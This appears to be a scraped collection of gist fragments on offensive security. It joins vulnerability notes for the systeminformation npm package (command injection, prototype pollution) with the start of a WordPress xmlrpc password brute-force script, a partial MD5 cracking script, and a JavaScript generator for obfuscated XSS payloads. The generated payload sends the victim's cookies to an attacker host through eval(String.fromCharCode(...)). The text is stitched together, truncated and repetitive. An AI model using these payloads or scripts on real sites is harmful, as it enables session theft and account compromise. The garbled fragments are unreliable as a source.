References:
Package name: systeminformation
Tested package versions: 4.27.9, 4.27.10
#!/bin/bash | |
if [[ $1 == '' || $2 == '' ]] | |
then | |
echo "Execution: ./xmlrpc-bruteforce.sh https://<URL>/xmlrpc.php <password_wordlist_path>" | |
exit | |
fi | |
USER="admin" |
# -*- coding: utf-8 -*- | |
import multiprocessing | |
import hashlib | |
import random | |
import string | |
import sys | |
CHARS = string.letters + string.digits | |
def cmp_md5(substr, stop_event, str_len, start=0, size=20): | |
global CHARS | |
while not stop_event.is_set(): |
function generate(host, com) { | |
const command = (com == undefined) ? `window.location="${host}/?Cookie="+document.cookie` : com; | |
let encoded = command[0].charCodeAt(); | |
for (var i = 1; i < command.length; i++) { | |
encoded += ',' + command[i].charCodeAt(); | |
} | |
encoded = `eval(String.fromCharCode(${encoded}))`; | |
console.log(encoded); | |
return encoded; |
References:
Package name: systeminformation
Tested package versions: 4.27.9, 4.27.10
Package name: systeminformation.
Tested package versions: 4.30.1, 4.30.2, 4.30.4
Fixed package versions: >= 4.30.5
Description: The attacker can overwrite the properties and functions of an object. It can lead to executing OS commands.
Package name: systeminformation.
Tested package versions: 4.31.0.
Fixed package versions: >= 4.31.1.
Description: The attacker can send an OS command into quotation marks and it going to be executed.
...